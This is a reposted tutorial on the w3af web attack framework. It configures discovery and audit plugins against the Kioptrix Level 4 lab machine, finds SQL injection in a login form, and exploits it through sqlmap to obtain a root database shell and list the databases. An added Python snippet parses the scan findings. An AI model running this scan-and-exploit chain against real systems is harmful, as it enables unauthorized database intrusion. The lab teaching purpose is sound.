
w3af: A Simple Usage Tutorial


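w3af is a Web Application Attack and Audit Framework. The project has more than 130 plugins, including plugins for site crawling, SQL injection, cross-site scripting (XSS), local file inclusion (LFI), remote file inclusion (RFI) and more. The project's goal is to build a framework for finding and exploiting web application security vulnerabilities, so it is easy to use and extend.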

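0×00 Overview

Using w3af on BackTrack 5 R3 to test the SQL injection vulnerability in Kioptrix Level 4.

0×01 Introduction

w3af is a Web Application Attack and Audit Framework. The project has more than 130 plugins, including plugins for site crawling, SQL injection, cross-site scripting (XSS), local file inclusion (LFI), remote file inclusion (RFI) and more. The project's goal is to build a framework for finding and exploiting web application security vulnerabilities, so it is easy to use and extend.

0×02 Installation

```
root@bt:~# apt-get install w3af
```

0×03 Startup

```
root@bt:~# cd /pentest/web/w3af/
root@bt:/pentest/web/w3af# ./w3af_console
```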

0×04 Vulnerability Scan Configuration

```
w3af>>> plugins
//enter the plugins module
w3af/plugins>>> list discovery
//list the plugins available for discovery
w3af/plugins>>> discovery findBackdoor phpinfo webSpider
//enable the three plugins findBackdoor, phpinfo and webSpider
w3af/plugins>>> list audit
//list the plugins available for vulnerability auditing
w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss
//enable the five plugins blindSqli, fileUpload, osCommanding, sqli and xss
w3af/plugins>>> back
//return to the main module
w3af>>> target
//enter the target configuration module
w3af/config:target>>> set target http://192.168.244.132/
//set the target to http://192.168.244.132/
w3af/config:target>>> back
//return to the main module
```

0×05 Vulnerability Scan

```
w3af>>> start
---
New URL found by phpinfo plugin: http://192.168.244.132/
New URL found by phpinfo plugin: http://192.168.244.132/checklogin.php
New URL found by phpinfo plugin: http://192.168.244.132/index.php
New URL found by webSpider plugin: http://192.168.244.132/
New URL found by webSpider plugin: http://192.168.244.132/checklogin.php
New URL found by webSpider plugin: http://192.168.244.132/index.php
Found 3 URLs and 8 different points of injection.
The list of URLs is:
- http://192.168.244.132/index.php
- http://192.168.244.132/checklogin.php
- http://192.168.244.132/
The list of fuzzable requests is:
- http://192.168.244.132/ | Method: GET
- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")
- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")
- http://192.168.244.132/checklogin.php | Method: GET
- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")
- http://192.168.244.132/index.php | Method: GET
- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")
- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")
Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.
SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.
Scan finished in 19 seconds.
---
//initial scan
```
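An added example, not part of the original tutorial or of w3af itself: a small Python parser for the finding lines in the scan output above, grouping them by injection point so that each URL, method and parameter needing a fix is reported once. The regular expressions assume the message wording shown on this page, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Lines copied from the scan output shown on this page.
SCAN_OUTPUT = '''\
Found 3 URLs and 8 different points of injection.
Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.
SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.
Scan finished in 19 seconds.
'''

# Patterns assume the exact phrasing of the messages above (an assumption).
FINDING = re.compile(r'^(?P<kind>.+?) was found at: "(?P<url>[^"]+)", '
                     r'using HTTP method (?P<method>[A-Z]+)\.')
PARAM = re.compile(r'(?:injectable parameter is: |modified parameter was )"(?P<param>[^"]+)"')
IDS = re.compile(r'requests? with ids? (\d+)(?: to (\d+))?')

def parse_findings(text):
    """Return one dict per finding line; all other output lines are skipped."""
    findings = []
    for line in text.splitlines():
        head, param = FINDING.match(line), PARAM.search(line)
        if not head or not param:
            continue  # progress lines, bare SQL error notices, separators
        ids = IDS.search(line)
        first = int(ids.group(1)) if ids else None
        last = int(ids.group(2)) if ids and ids.group(2) else first
        findings.append({**head.groupdict(), "param": param.group("param"),
                         "request_ids": (first, last)})
    return findings

def group_by_injection_point(findings):
    """Map (url, method, param) to the sorted finding kinds reported for it."""
    grouped = defaultdict(set)
    for f in findings:
        grouped[(f["url"], f["method"], f["param"])].add(f["kind"])
    return {point: sorted(kinds) for point, kinds in grouped.items()}

if __name__ == "__main__":
    report = group_by_injection_point(parse_findings(SCAN_OUTPUT))
    for (url, method, param), kinds in report.items():
        print(f"{method} {url} param={param}: {', '.join(kinds)}")
```
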

0×06 Exploit Configuration

```
w3af>>> exploit
//enter the exploit module
w3af/exploit>>> list exploit
//list the plugins available for exploitation
w3af/exploit>>> exploit sqlmap
//use sqlmap to test the SQL injection vulnerability
---
Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <sql object ( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )>
Please use the interact command to interact with the shell objects.
---
//the test confirms that a SQL injection vulnerability exists
//note the shell object id here (0 in this case); it is needed in the next step
```

0×07 Exploitation

```
w3af/exploit>>> interact 0
//interact plus the shell object id gives access to it
---
Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shell
w3af/exploit/sqlmap-0>>>
---
//an interactive sqlmap module
w3af/exploit/sqlmap-0>>> dbs
---
Available databases:  [3]:
[*] information_schema
[*] members
[*] mysql
---
//the database information was obtained successfully
```

A tutorial for a similar security scanner, from IBM: "Using IBM Rational Appscan: Analyzing Scan Results" (http://www.91ri.org/3809.html)

Reposted from freebuf, author: line. Collected and organized by the information security team of the Network Security Attack and Defense Research Lab (www.91ri.org).
